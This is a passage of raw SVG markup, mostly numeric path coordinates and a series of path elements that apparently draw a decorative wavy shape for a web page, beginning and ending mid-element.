.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path 